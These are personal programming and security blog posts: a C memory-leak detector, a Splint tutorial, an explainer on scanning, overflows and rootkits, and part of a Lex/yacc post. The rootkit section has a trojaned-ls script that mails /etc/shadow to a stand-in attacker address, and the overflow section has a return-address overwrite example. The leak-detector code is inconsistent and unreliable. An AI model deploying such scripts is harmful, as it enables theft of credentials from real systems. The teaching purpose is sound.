Memory Leak detector

1 12 2010

When you are writing a program and you want it to be able to run for a long period of time or when some procedure is called a x times in the lifetime of running program (let x tend to infinity) maybe is a good opportunity to make sure all your malloc calls have one free call (new,delete in C++).This sounds very natural to any experienced programmer.

Now imagine that you have download some huge chunk of code and you want to call it x times, lets say 100 times per second. Maybe the person who wrote the code, did not think about memory management and maybe you do not have the patience to read the huge piece of code. What you need is a memory leak detector.

If you do not have any of these problems might be interested in knowing how to gain millions of euros on the internet.

Here I will show an example of how to write a simple memory leak detector in C++ for C (malloc,free), is trivial to convert it to verify memory leaks in C++.

The main idea is to keep the line number of each malloc we do and then verify if we did free, we will accomplish this by redefining the malloc and free call, without need to write our own free or malloc, thanks to C pre processor.

First we define an entity, this keep all the information we need about each malloc call.

class Entity {
private:
	unsigned int _address;
	unsigned int _line;
public:
	Entity(unsigned int addr, unsigned int line) {
		this->_address = addr;
		this->_line = line;
	}
	unsigned int & getOrSetAddress() {
		return this->_address;
	}
	unsigned int getLine() {
		return this->_line;
	}
};

typedef std::list<Entity *> Memory;
Memory *memory;

I used the standard C++ lists instead of std::vector because I will need to remove and add elements, without the need to call find in algorithms module, what bugs me.

Now I will define the function to add elements to our std::list

void InsertOnMalloc(unsigned int addr, unsigned int n) {
	if(!memory)
		memory = new Memory;

	memory->insert(memory->begin(), new Entity(addr,n));
}

Now I will define the function to remove elements to our std::list

void RemoveOnFree(unsigned int addr) {
	if(!memory)
		return;
	for(Memory::iterator it = memory->begin(); it != allocList->end(); it++)
	{
		Entity *entity = *it;
		if(entity->getOrSetAddress() == addr) {
			memory->remove();
			break;
		}
	}
}

The idea so far is to call InsertOnMalloc for each malloc call and RemoveOnFree for each free. After this if we have any element in our memory we need to print that out, to see which line we do not call free.

void ShowLeaks() {
	for(Memory::iterator it = memory->begin(); it != memory->end(); it++)
		std::cout << "Must make free to this malloc call: " << (*it)->getLine() << std::endl;
}

Now, lets do the real juice of this leak detector: here I will modify the malloc call to a regular malloc followed by an insertion, and a free call for a regular free call followed by removal on our memory list

#define malloc(p) mallocz((p),__LINE__)
#define free(p) freez((p))

static inline void *  mallocz(unsigned int size, int line) {
	#undef malloc
	void *ptr = (void *)malloc(size);
	#define malloc(p) mallocz((p),__LINE__)
	Insert((unsigned int)ptr, line);
	return(ptr);
};
static inline void  mydelz(void *p) {
	RemoveOnFree((int)p);
	#undef free
	free(p);
	#define free(p) freez((p))
};

Now, if you want to use this “library” in your code, you save it to file filename.h and on you code you just import it and then call ShowLeaks() to show what mallocs you forgot to make free.





Splint the static C code checker

3 05 2009

Splint is this great tool to statically analyze C code. Splint is an evolution of Lint. Lint makes analysis of C code and verifies unused declarations, type inconsistencies, use before definitions, unreachable code, ignored return values, execution path with no return and infinite loops. However, Lint was not a sufficiently powerful tool. Splint was created as a descendant of Lint allowing annotations in C code, so, it do more checks than its predecessor. In this post I will present some verifications that Splint does, and show the philosophy and how to use it. Splint allows annotations on functions, variables, parameters and types.

Undefined Variables

Splint detects instances where the value of a variable is used before it is defined. Anyway, many static analyzers can also do this, it is a very basic check. However, thanks to the splint annotations supports, they can be used to describe what storage must be defined and what storage must be undefined at interface points, this means that all storage reachable from a global variable, parameter to a function, or function return value is defined before and after the function call.

A special case of undefined variables is undefined function parameters. Sometimes we do a certain C function that return values, or change parameters values. The out annotation denotes a pointer to storage that may be undefined. Splint have a great storage model, so does not report an error when a pointer to allocated but undefined storage is passed as an out parameter. If in the body of a function an outparameter is allocated but not bounded to a value Splint reports an error. You can see out as an parameter that will be defined inside a function. The opposite happens to the in annotation, this can be used to denote a parameter that must be completely defined.
Here is a small example of it:

extern void setVal (/*@out@*/ int *x);
extern int getVal (/*@in@*/ int *x);
extern int mysteryVal(int *x);

int dumbfunc(/*@out@*/ int *x, int i) {
    if (i > 3)
11         return *x;
    else if (i > 1)
13         return getVal (x);
    else if (i == 0)
15         return mysteryVal (x);
    else {
18         setVal (x);
19         return *x;
    }
}

And here it is the output of Splint:

> splint usedef.c
usedef.c:11: Value *x used before definition
usedef.c:13: Passed storage x not completely defined
    (*x is undefined): getVal (x)
usedef.c:15: Passed storage x not completely defined
    (*x is undefined): mysteryVal (x)
Finished checking --- 3 code warnings

As you can see, no error is reported for line 18, because the incomplete defined storage x is passed to a function that will define it, so we can return *x with no problems.

Types

Strong type checking often reveals programming errors. Splint can check primitive C types more strictly and flexibly than typical compilers.

C, does not make types verification. Because for C all basic non numerical types are just int’s (Enum, Pointer, Char). Splint supports stricter checking of built-in C types. The char and enum types can be checked as distinct types, and the different numeric types can be type-checked strictly. Also the primitive char type can be type-checked as a distinct type. If char is used as a distinct type, common errors involving assigning ints to chars are detected.

In Splint, you can always turn off some default verifications, and Splint will assume the C compiler strategy to verify the code. If you run Splint with +charint is on, char types are indistinguishable from ints. So you can make cast’s from int to char or from cahr to int. But never forgot that this can lead to errors, as you can imagine if you do (char) 1000 you will not get an expected result because the characters only go up to 256.

Splint reports errors in the use of Enums, if a value that is not an enumerator member is assigned to the enum type or if an enum type is used as an operand to an arithmetic operator. Anyway you can turn this off, activating the enumint flag and then you can use enums and ints types interchangeably.

Memory Management

About half the bugs in typical C programs can be attributed to memory management problems.

Any C programmer who has already made a reasonable size program, has been confronted with unexpected errors related with memory management problems. This happens basically because C is a low level language so, does not have any system like Java’s garbage collector. All the memory management have to be done by the programmer, so errors may append. Some only appear sporadically, and some may only be apparent when compiled on a different platform. Splint is able to detect many memory management errors at compile time, like: using storage that may have been deallocated, memory leaks or returning a pointer to stack-allocated storage. This is possible because Splint makes a memory model when is working on the code, anyway I will not talk about this subject.

Splint can see and report deallocating storage when there are other live references to the same storage and failing to deallocate storage before the last reference to it is lost. The solution here is simple, Splint makes an obligation to release storage and attach this obligation to the reference to which the storage is assigned.

For references not shared Splint uses the only annotation to indicate that a reference is the only pointer to the object it points to, here we also use the null annotation to say that the output of malloc could be NULL:

/* @only@ */ /* @null@ */ void * malloc ( size_t size );

Here is a simple example of C annotated code with memory leaks and use after free variables:

1 extern /*@only@*/ int *glob;
/*@only@*/ int *f (/*@only@*/ int *x, int *y, int *z) /*@globals glob;@*/ {
8    int *m = (int *)
9    malloc (sizeof (int));
11   glob = y;   //Memory leak
12   free (x);
13   *m = *x;   //Use after free
14    return z;   //Memory leak detected
}

Here is the Splint output for the file above:

> splint only.c
only.c:11: Only storage glob (type int *) not released before assignment: glob = y
only.c:1: Storage glob becomes only
only.c:11: Implicitly temp storage y assigned to only: glob = y
only.c:13: Dereference of possibly null pointer m: *m
only.c:8: Storage m may become null
only.c:13: Variable x used after being released
only.c:12: Storage x released
only.c:14: Implicitly temp storage z returned as only: z
only.c:14: Fresh storage m not released before return
only.c:9: Fresh storage m allocated

Splint errors and warnings are very human readable, so you just have to read them to understand.
The first warning says that variable glob was not released (we say, in line 1, that it is only) before the assignment. In line 13 we have a dereference of possibly null pointer, because in line 12 we have done free to x variable, an now we want to use it’s value. As you can see, is very easy to understand the output of Splint.

Splint can also make verifications in stack based references. A memory error occurs if a pointer into stack is live after the function returns. Splint detects errors involving stack references exported from a function through return values or assignments to references reachable from global variables or actual parameters.
No annotations are needed to detect stack reference errors. It is clear from declarations if storage is allocated on the function stack.

Here is an example of stack-allocated storage:

int *glob;

int *f (int **x) {
    int sa[2] = { 0, 1 };
    int loc = 3;
9   glob = &loc;
10  *x = &sa[0];
12  return &loc;
}

And here is the Splint output:

> splint stack.c
stack.c:12: Stack-allocated storage &loc reachable from return value: &loc
stack.c:12: Stack-allocated storage *x reachable from parameter x
stack.c:10: Storage *x becomes stack
stack.c:12: Stack-allocated storage glob reachable from global glob
stack.c:9: Storage glob becomes stack

Control Flow

In order to avoid certain errors, Splint have to understand the control flow of the program, so Splint do some checks related to control flow. Many of these checks are possible because of the extra information that is known in annotations. Without this additional information Splint assumes that all functions return and execution continues normally.

noreturn annotation is used to denote a function that never returns.

extern /* @noreturn@ */ void fatalerror ( char *s);

We also have maynoreturn and alwaysreturns annotations, but Splint must assume that a function returns normally when checking the code and doesn’t verify if a function really returns.

To describe non-returning functions the noreturnwhentrue and noreturnwhenfalse mean that a function never returns if the first argument is true or false.

/* @noreturnwhenfalse@ */ void assert (/* @sef@ */ bool /* @alt int@ */ pred );

The sef annotation denotes a parameter as side effect free, and the alt int indicate that it may be either a Boolean or an integer.

Undefined Behavior

The order which side effect take place in C is not entirely defined by the code.

A sequence point is some point in the C code where it is guaranteed that all side effects of previous evaluations have been performed.
An example of sequence points is:

  • a function call (after the arguments have been evaluated)
  • at the end of a if, while, for or do statement
  • a &&, || and ?

Here is a simple C program that have undefined behavior.

extern int glob;
extern int mystery (void);
extern int modglob (void) /*@globals glob@*/ /*@modifies glob@*/;

int f (int x, int y[]) {
11    int i = x++ * x;
13    y[i] = i++;
14    i += modglob() * glob;
15    i += mystery() * glob;
16    return i;
}

And here is the Splint output:

> splint order.c
order.c:11: Expression has undefined behavior (value of right operand modified by left operand): x++ * x
order.c:13: Expression has undefined behavior (left operand uses i, modified by right operand): y[i] = i++
order.c:14: Expression has undefined behavior (value of right operand modified by left operand): modglob() * glob
order.c:15: Expression has undefined behavior (unconstrained function mystery used in left operand may set global variable glob used in right operand): mystery() * glob

Regard control flow, Splint has more options to check C code. I will not talk about all of them here.

Buffer Sizes

Buffer overflow errors are a particularly dangerous type of bug in C, they are responsible for half of all security attacks. This is happens because C does not perform runtime bound checking (for performance reasons), and so attackers can exploit program bugs to, for example, gain full access to a machine.

Splint models blocks of memory using two properties:
maxSet, maxSet(b) denotes the highest address beyond b that can be safely used as lvalue, for instance:

char buffer[MAXSIZE] we have maxSet(buffer) = MAXSIZE - 1

and maxRead, maxRead(b) denotes the highest index of a buffer that can be safely used as rvalue.

When a buffer is accessed as an lvalue, Splint generates a precondition constraint involving the maxSet property and when a buffer is accessed as an rvalue, Splint generates a precondition constraint involving the maxRead property.

We can use this two properties in buffer sizes annotations, this annotations uses the clause requires and ensures just like JML, VDM and Frama-C. When a function with requires clause is called, the call site must be checked to satisfy the constraints implied by requires.

Here is an example of its use:

void /* @alt char * @*/ strcpy
(/* @out@ */ /* @returned@ */ char *s1 , char *s2)
/* @modifies * s1@ */
/* @requires maxSet (s1) >= maxRead (s2) @*/
/* @ensures maxRead (s1) == maxRead (s2) @*/;

This is a possible annotation for strcpy standard library C function. We say that s1 is the return value of the function (returned), and that the pointer to s1 is the only one (only). We also say that this function modifies s1 and we specify the pre and post conditions.

Splint can also do bound checking. This is more complex than other checks done by Splint, so, memory bound warnings contain extensive information about the unresolved constraint as you can see in this example:

int buf [10];
buf [10] = 3;
setChar .c :5:4: Likely out -of - bounds store : buf [10]
Unable to resolve constraint : requires 9 >= 10
needed to satisfy precondition : requires maxSet ( buf @ setChar .c :5:4) >= 10

The ultimate test: wu-ftpd

wu-ftpd version 2.5.0 was about 20.000 lines of code and took less than four seconds to check all of wu-ftpd on a 1.2-GHz Athlon machine. Splint detected the known flaws as well as finding some previously unknown flaws (!)

One of the problems of these automatic static analysis tools is that it can produce false problems.
Running Splint on wu-ftpd without adding annotations produced 166 warnings for potential out-of-bounds writes. After adding 66 annotations, it produced 101 warnings: 25 of these indicated real problems and 76 were false.

Pros and Cons

Pros:

  • Lightweight static analysis detects software vulnerabilities
  • Splint definitely improves code quality
  • Suitable for real programs…

Cons:

  • …although it produces more warning messages that lead to confusion
  • It won’t eliminate all security risks
  • Hasn’t been developed since 2007, they need new volunteers

Conclusions

No tool will eliminate all security risks, lightweight static analysis tools (Splint) play an important role in identifying security vulnerabilities.

Here is the presentation about that subject:

Outroduction

All the examples provide here is from the Splint manual.





Tracing the attack – Part II

22 01 2009

Intro

This post is the continuation of Tracing the attack – Part I. And this post is the final one, of this stack.
Here I’m gonna to talk about the Heap/BSS Overflow and Rootkits.

Heap

In the Stack, the memory is allocated by kernel (as explained in Part I). In the other hand the Heap is a structure where the program can dynamically allocate memory. With the use of malloc(), realloc() and calloc() functions.

BSS segment

BSS stands for Block Started by Symbol and is used by compilers to store static variables. This variables are filled with zer-valued data at the start of the program. In C programing language all the not initialized and declared as static variables are placed in the BSS segment.

Heap/BSS Overflow

As a simple example, extracted from w00w00 article, to demonstrate a heap overflow:

   /* demonstrates dynamic overflow in heap (initialized data) */
   #define BUFSIZE 16
   #define OVERSIZE 8 /* overflow buf2 by OVERSIZE bytes */

   int main()
   {
      u_long diff;
      char *buf1 = (char *)malloc(BUFSIZE), *buf2 = (char *)malloc(BUFSIZE);

      diff = (u_long)buf2 - (u_long)buf1;
      printf("buf1 = %p, buf2 = %p, diff = 0x%x bytesn", buf1, buf2, diff);

      memset(buf2, 'A', BUFSIZE-1), buf2[BUFSIZE-1] = '';

      printf("before overflow: buf2 = %sn", buf2);
      memset(buf1, 'B', (u_int)(diff + OVERSIZE));
      printf("after overflow: buf2 = %sn", buf2);

      return 0;
   }

Now, when we execute this code with parameter 8:

   [root /w00w00/heap/examples/basic]# ./heap1 8
   buf1 = 0x804e000, buf2 = 0x804eff0, diff = 0xff0 bytes
   before overflow: buf2 = AAAAAAAAAAAAAAA
   after overflow: buf2 = BBBBBBBBAAAAAAA

This works like that, because buf1 overruns its boundary and write data in buf2 heap space. This program don’t crash because buf2 heap space still a valid segment.

To see a BSS overflow we just have to replace the:
‘char *buf = malloc(BUFSIZE)’, by: ‘static char buf[BUFSIZE]’

If the heap is non-executable that will prevent the use of function calls there. But even so, that won’t prevent heap overflows.

I won’t talk anymore about that subject in this post, if you want to learn more about that you can see the w00w00 article, and some-more from the references section (at the end of this post).

Rootkits

After gaining access the target machine (using an exploit for example), the attacker must ensure will continue to have access even after the victim has fixed the vulnerability, and without it knows that the system remains compromised. And the attacker can achieve this through the installation of a rootkit on the target machine.
A rootkit is basically a set of tools (backdoors and trojan horses) designed with the aim to provide absolute control of the target machine. A backdoor is a way to authenticate a legitimate machine, providing remote access the same while trying to remain undetected. For example, you can take the form of a program or a change in a program already installed. A trojan horse (or just textittrojan) is usually a program that supposedly plays a role but which actually also plays other malicious functions without the knowledge of the victim.
Then we show a very simple example of a bash script that creates a possible trojaned ls:

#!/ bin/bash
mv /bin/ls /bin/ls.old
/bin/echo "cat /etc/shadow | mail attacker@domain.com" > /bin/ls
/bin/echo "/ bin/ls.old" >> /bin/ls
chmod +x /bin/ls

It is clear that we are not considering the fact that the ls can receive arguments, this is just for example purposes. And is good to show an example of the objective of a trojan.

Usually the use of a real trojan would install a modified versions of several binary (lsof, ps, etc). The idea of changing this programs is to hide the trojan itself. With a ps changed command, the user could not see the trojan process running.

Here is a list of the changed programs when you install Linux Rootkit 4:

bindshell	port/shell type daemon!
chfn		Trojaned! User > r00t
chsh		Trojaned! User > r00t
crontab     Trojaned! Hidden Crontab Entries
du		Trojaned! Hide files
find		Trojaned! Hide files
fix		File fixer!
ifconfig	Trojaned! Hide sniffing
inetd		Trojaned! Remote access
killall		Trojaned! Wont kill hidden processes
linsniffer	Packet sniffer!
login		Trojaned! Remote access
ls             Trojaned! Hide files
netstat      Trojaned! Hide connections
passwd	Trojaned! User > r00t
pidof		Trojaned! Hide processes
ps		Trojaned! Hide processes
rshd		Trojaned! Remote access
sniffchk	Program to check if sniffer is up and running
syslogd	Trojaned! Hide logs
tcpd		Trojaned! Hide connections, avoid denies
top		Trojaned! Hide processes
wted		wtmp/utmp editor!
z2		Zap2 utmp/wtmp/lastlog eraser!

There are many rootkits over the network, the most common, compromise Windows and Unix systems.

Detecting and removing rootkits

When someone suspect that his system have been compromised, the best thing wold be use some tool to detect and remove rootkits. We have, for Linux: chkrootkit and rkhunter and for Windows you can use the RootkitRevealer.

As curious, I would like to mention that in 2005, Sony BMG put a rootkit in several CDs of music that is self-installed (without notice) on computers where the CDs were read, for more about this.

Outroduction

As we saw, an attacker start of using a scanner against a particular range of ip’s, would then see if there are services available, then do a dictionary attack using the country’s victim language, extracted from the IP. Or could also detect vulnerabilities in the system, that he could use to gain access. After having access to the computer the attacker terminate by installing a rootkit to gain permanent access to this system.

As a bonus I also explain some minimalistic examples of how can someone, that have physical access to a system, can gain root access to it exploiting some programs that are running in that system.

This area is so vast that is still impossible to predict the ways to do an attack. Imagine that an attacker gain access to a computer, but they don’t have root credentials. Attackers probably will try to exploit some programs that are running in that systems…

References





Tracing the attack – Part I

21 01 2009

Intro

In this post I will talk about some of the techniques used to attack systems, and some solutions that can reduce much the number of attacks that a system may suffer. A vision to the attack from scanning to gain root in one system.
This work is a continuation of my work on honeypots. The attacks presented here could be seen in a honeypot of high activity, real systems that have known vulnerabilities. Unfortunately I used one low activity honeypot in previous posts, emulation of vulnerabilities, so I just could not get to identify some of the attacks mentioned herein.
This post continues in Part II.

Starting

First let me talk about the profile of the principal threat that we face from the moment
we use the Internet, the Script Kiddie.
To a Script Kiddie not interest who is he attacking, its only purpose is to gain root access in a machine. The problem is that for helping him he has several tools that automate all the process, the only thing that usually has to do is put the tool to scan the entire Internet.
Sooner or later it is guaranteed that he will get access in some machine.
The fact that these tools are becoming more known ally to randomness searches, this threat is extremely dangerous because it is not “if” but “when” we will be victims of a search.

I introduced the “who”, now let me introduce the “how”. Before starting any type of attack, the enemy must find that machines are online and their ports (services) that are open to the outside.
This technique is called Port Scanning

Port Scanning

Port Scanning is used both by system administrators and by attackers, the first thing to determine the level of security of their machines; seconds to find the vulnerabilities as I said before.
I will give special focus to this technique because it domain is essential in both situations.

Basically a Port Scan is send a message to each port of a machine and depending on what kind of response we get determine the status of the port.

These possible state ports are:

  • Open or Accepted: The machine has sent a response to indicate that a service that is listening port
  • Closed, Denied or Not Listening: The machine has sent a response to indicate that any connection the port will be denied
  • Filtered, Dropped or Blocked: There was no response from the machine

Just a note on the legality of this technique: in fact Port Scanning can be seen as a bell to ring to confirm if someone is home. Nobody can be accused of nothing just for doing a Port Scan. Now if we are playing constantly on the bell, could be alleged the similarity to a denial of service (for more about legal issues related to Port Scanning).

Now we are ready to see the most popular techniques in Port Scanning.

TCP SYN scan

The SYN scan is the most popular because it can be done in a very quick way, searching thousands
of ports per second on a network (fast network and without firewalls). This kind of scan is relatively discreet because they never complete TCP connections. It also allows a distinct differentiation between the states of ports with a good confidence.
This technique is also known as semi-open scan because it never gets to open a complete TCP connection. It is sent a SYN packet (the beginning of a normal complete connection) and expects a answer. If it receives a SYN/ACK, the port is Open, if it receives a RST, the port is Closed, and if there is no response after several retransmissions of the SYN, the port is marked as Filtered.
This last scenario repeats itself in the event of an ICMP Unreachable Error.

Normal scenario (client send a SYN, server reply with SYN/ACK, and client send an ACK):

TCP SYN attack (client send a SYN, server reply with SYN/ACK, and client do nothing):

This technique is used when the user does not have privileges to create crude packets (in nmap for example, you must have root privileges to this option.) Rather than be sent in “custom” packets as in all other techniques mentioned here, it established a complete TCP connection in the target machine port. This causes a considerable increase of time for giving same information as the previous technique (most packets are produced). In addition, most operative systems log these connections, because it is not a quick or silent scan. On Unix, for example, is added an entry in syslog.

UDP scan

A UDP scanis much slower than a TCP one, one of the reasons why many systems administrators ignore the security of these ports, but not the attackers.
This technique consists in sending an empty UDP header (no data) to all target ports. If an ICMP Unreachable Error is returned, depending on type and code of error is given the port state (Closed or Filtered). However if returned another UDP header, then the port is Open, if not received any response after the retransmissions of the header, the port is classified as a combination of Open or Filtered because may be in a state or in the other.

But as I said the greatest disadvantage of this technique is the time spent on scan; Open or Filtered ports rarely respond which can lead to several retransmissions (because it is assumed that the packet could have been lost). Closed ports are an even bigger problem because normally respond with ICMP Unreachable Errors and many operative systems limit the frequency of ICMP packets transmission, as a example in Linux that normally limited to a maximum of one package per second.

Faced with such constraints, if we were to the full range of ports of a machine (65536 ports) it will take more than 18 hours. Some optimizations can pass through the more common ports.

There are many others techniques used in Port Scanning (more information: here) but this ones come to show the behavior of this type of scan. It is easy to see why it is a critical process for an attacker methodology. For the correct identification of the target, only one technique can not be the most appropriate/enough.
So the Port Scanning area is not only making TCP SYN scans.
The tool I recommend to Port Scanning is the Nmap because it supports all these techniques that I said, and a lot more. This tool is being actively developed, and the author Gordon “Fyodor” Lyon is a guru in this area and highly responsible for the constant development of it.

For more information about Port scanning go to Nmap page explaining Port Scanning Techniques.

Gain access to the machine

At this time the attacker already has a huge list of reachable machines and services. Now to get remote access on a machine, in essence, we can use two techniques: brute-force/password dictionaries (see the Infinite monkey theorem).

It may seem silly but it is still heavily used in services such as SSH. As you can see in your /var/log/auth.log file…

Dec 24 01:24:46 kubos sshd[23906]: Invalid user oracle from 89.235.152.18
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:24:46 kubos sshd[23906]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:24:48 kubos sshd[23906]: Failed password for invalid user oracle from 89.235.152.18 port 48785 ssh2
Dec 24 01:24:49 kubos sshd[23908]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Dec 24 01:26:01 kubos sshd[23963]: Invalid user test from 89.235.152.18
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:01 kubos sshd[23963]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:04 kubos sshd[23963]: Failed password for invalid user test from 89.235.152.18 port 57886 ssh2
Dec 24 01:26:05 kubos sshd[23965]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

Dec 24 01:26:21 kubos sshd[23975]: Invalid user cvsuser from 89.235.152.18
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): check pass; user unknown
Dec 24 01:26:21 kubos sshd[23975]: pam_unix(ssh:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=89.235.152.18
Dec 24 01:26:22 kubos sshd[23975]: Failed password for invalid user cvsuser from 89.235.152.18 port 59883 ssh2
Dec 24 01:26:24 kubos sshd[23977]: reverse mapping checking getaddrinfo for 89-235-152-18.adsl.sta.mcn.ru [89.235.152.18] failed - POSSIBLE BREAK-IN ATTEMPT!

And these are just some of the hundreds of attempts that it recorded.
I will then present some strategies for protection against these attacks:

Use strong passwords

This section may seem ridiculous but the fact that this type of attack is used demonstrates the lack of choice of passwords culture.
Here are some requirements to define a strong password in today times:

  • A password should have, a minimum of 8 characters
  • If the password can be found in a dictionary is trivial and is not good. Attackers have large dictionaries of words in different languages (via IP, for example, can determine the dictionary to use)
  • As trivial variations of trivial passwords, such as “p4ssword” is almost as bad as “password” in a dictionary attack but is substantially better in an brute-force attack
  • The password should ideally be a combination of symbols, numbers, uppercase and lowercase
  • Mnemonic are easy to remember (even with special symbols) and this is the best kind of passwords, such as “Whiskey-Cola is EUR 3 in Academic Bar!” = “W-CiE3iAB!” (this password is Very String according to The Password Meter)

The fact is, using strong passwords can prevent the success of the attempt but not prevent the numerous attempts that are made consistently. And in an extreme situation might be suffering Denial of Service attacks (it is imperative to avoid this on a machine whose purpose is to offer the service to the outside).

Not mentioned the fact that we can limit the number of connections established in the port 22 (SSH) through iptables.

Using iptables to mitigating the attacks

We can limiting the access to a single source:

iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.100 --dport 22 -j ACCEPT

The -s flag is used to indicate the source host ip.
We can also restrict the access to some sub-net, or some IP class address with this flag:

iptables -A INPUT -m state --state NEW -m tcp -p tcp -s 192.168.1.0/24 -dport 22 -j ACCEPT

If we want access our machine from everyware we might want to limit our server to accept, for example, 2 connections per minute:

iptables -N SSH_CONNECTION -A INPUT -m state --state NEW -p tcp --dport 22 -j SSH_CONNECTION -A SSH_CONNECTION -m recent --set --name SSH -A SSH_CONNECTION -m recent --update --seconds 60 --hitcount 3 --name SSH -j DROP

We can create a new chain called SSH_CONNECTION. The chain uses the recent module to allow at maximum two connection attempts per minute per IP.

RSA authentication

To avoid the use of passwords, we can use a pair of RSA keys completely avoiding brute-force/dictionaries attacks.
To do this we will do the following steps:
Generate the key pair with the command

ssh-keygen-t rsa

This command create the files:
~/.ssh/id_rsa (private key) and ~/.ssh/id_rsa.pub (public key).
In each machine where we want to connect (target), put the “id_rsa.pub” generated in ~/.ssh/authorized_keys concatenate the contents of this form for example:

cat id_rsa.pub >> ~/.ssh/authorized_keys

In each machine where we want to call (home), put the “id_rsa” in ~/.ssh/
Only missing off the password-based login to add the line “PasswordAuthentication no” in /etc/ssh/sshd_config and then restart the daemon “sshd” through:

/etc/init.d/sshd restart

Exploitation of vulnerabilities

Now that we reduce the chances of being attacked, let’s see another way that attackers use to gain access into a system.
Exploit is the name given to a piece of code used to exploit flaws in applications in order to cause a behavior not previously anticipated in them. Thus is common, for example, gaining control of a machine or spread privileges.
A widely used type of exploit is stack smashing which occurs when a program writes a memory address outside their allocated space for the structure of data in the stack, usually a buffer of fixed size. Take a very simple example of local implementation of this exploit:

# include
# include 

int main(int argc , char *argv []) {
         char buffer [10];
         strcpy (buffer ,argv [1]);
         printf ( buffer );
         return 0;
}

When we try to execute the above code, we get:

user@honeypot :~$ gcc exploit .c -o exploit
user@honeypot :~$ ./ exploit thisisanexploit
*** stack smashing detected ***: ./ exploit terminated
thisisanexploitAborted

As we can see, GCC has introduced mechanisms for blocking implementation of code potentially malicious. But this example is as simple as possible. More sophisticated attacks against systems can avoid this mechanisms.

The stack

When a function is called, the return value must be addressed, and it address must be somewhere saved in the stack. Saving the return address into the stack is one advantage, each task has its own stack, so each must have its return address. Another thing, is that recursion is completely supported. In case that a function call itself, a return address must be created for each recursive phase, in each stack function call.
For example, the following code:

/** lengthOf  returns the length of list  l  */
public int lengthOf(Cell l) {
  int length;

  if ( l == null ) {
    length = 0;
  }
  else {
    length = 1 + lengthOf(l.getNext());
  }
  return length;
}

Will produce the following stacks:

The stack also contain local data storage. If any function declare local variables, they are stored there also. And may also contain parameters passed to the function, for more information about that.

GCC and Stack canary’s

If you wondering why a canary.
GCC, and other compilers insert in the stack known values to monitor buffer overflows. In the case that the stack buffer overflows, the first field to be corrupted will be the canary. Forward, the sub-routines inserted into the program by GCC verify the canary field and verify that this as changed, sending a message “*** stack smashing detected ***”.
For more information about this subject.

Stack corruption

If you still thinking what stack buffer overflow is god for? I give you a simple example (from Wikipedia article).
Imagine you have the following code:

void foo (char *bar)
{
   char  c[12];

   memcpy(c, bar, strlen(bar));  // no bounds checking...
}

int main (int argc, char **argv)
{
   foo(argv[1]);
}

As you can see, there are no verification about the input of the function foo, about the *bar variable.
This is the stack that are created at some point when this function is called by another one:

When you call the foo, like:

void function() {
  char *newBar = (char *)malloc(sizeof(char)*6);
  strcpy(newBar,"hello");
  foo(newBar);
}

This is what happens to the stack:

Now, if you try this:

void function() {
  char *newBar = (char *)malloc(sizeof(char)*24);
  strcpy(newBar,"A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​A​x08​x35​xC0​x80");
  foo(newBar);
}

This is what happens to the stack:

So, now, when the foo function terminates, it will pop the return address and jump to that address (0x08C03508, in this case), and not to the expected one. In this iamge, the address 0x08C03508 is the beginning of the char c[12] code. Where the attacker can previously put shellcode, and not AAAAA string…
Now imagine that this program is SUID bit on to run as root, you can instantly scale to root…

Fortunately this kind of attacks is being to reduce, since the introduction of stack canary’s. This kind of protection is possible because the stack is not dynamic, but as we gone see later (in part II), the heap is.

References





Lex/yacc

31 07 2008

Intro

Since long ago that I wanted to write about this. Finally I now have the time to write about syntactic analyzers generators.

When I was studding yacc noticed that there was much information available, not something one would expect of a tool with 40 years. Unfortunately there was no quick learning for someone who already knew the whole theory behind this kind of tools. As I said, the yacc is a very old tool, made when was needed compilers. Before there the whole theory of that area that we know today. So it is normal small errors transform themselves into disasters that may take a long time to be resolved.

This post is for those who already know what grammars are, lexical analyzers, etc., but that never touch in Lex/yacc or for those who are stuck with this things (I hope).

In this post I will explain to you Lex/yacc, with an example of a program that I did. I will not boring you with massive lines of code (like I usually do), because Lex/yacc is just a simple tool to use. With just 60 lines of explained code you will see how great that is.

The problem

My idea was to do a simple site with all the information about all the cities in Portugal. After reminded me to so but to all parishes (Freguesia in Portuguese), counties(Concelho in Portuguese) and districts(Distrito in Portuguese) of Portugal and their relationship. A district has many counties and one county has many parishes.

Simple! What I needed now was all the names of all parishes, counties and districts of Portugal, I eventually found three files with all this information and more in the Portuguese company of post office website. Better yet, these files had the relationship between each division. I have to do a small program in C that take those three files and create a new file, which I use on the Lex / yacc.

In order to have all available information on each local od Portugal I decided to use Wikipedia. This is the Achilles heel of the program, because unfortunately the entries of wikipedia on the Portuguese parishes are not uniform and many of the parishes or have entry. But still able to have good results.

The structure of the new file generated is:

District1>WikipediaEntry_for_District1
        Parish1_of_Countie1>WikipediaEntry_for_Parish1_of_Countie1,
        Parish2_of_Countie1>WikipediaEntry_for_Parish2_of_Countie1,
        Parish3_of_Countie1>WikipediaEntry_for_Parish3_of_Countie1,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie1
        !Countie1>WikipediaEntry_for_Countie1;
        Parish1_of_Countie2>WikipediaEntry_for_Parish1_of_Countie2,
        Parish2_of_Countie2>WikipediaEntry_for_Parish2_of_Countie2,
        Parish3_of_Countie2>WikipediaEntry_for_Parish3_of_Countie2,
        .
        .
        .
        ParishN_of_Countie1>WikipediaEntry_for_ParishN_of_Countie2
        !Countie2>WikipediaEntry_for_Countie2;
                .
                .
                .
        !CountieN>WikipediaEntry_for_CountieN|

District2>WikipediaEntry_for_District2
        Parish1_of_Countie1>WikipediaEntry_for_Parish1_of_Countie1,
        Parish2_of_Countie1>WikipediaEntry_for_Parish2_of_Countie1,
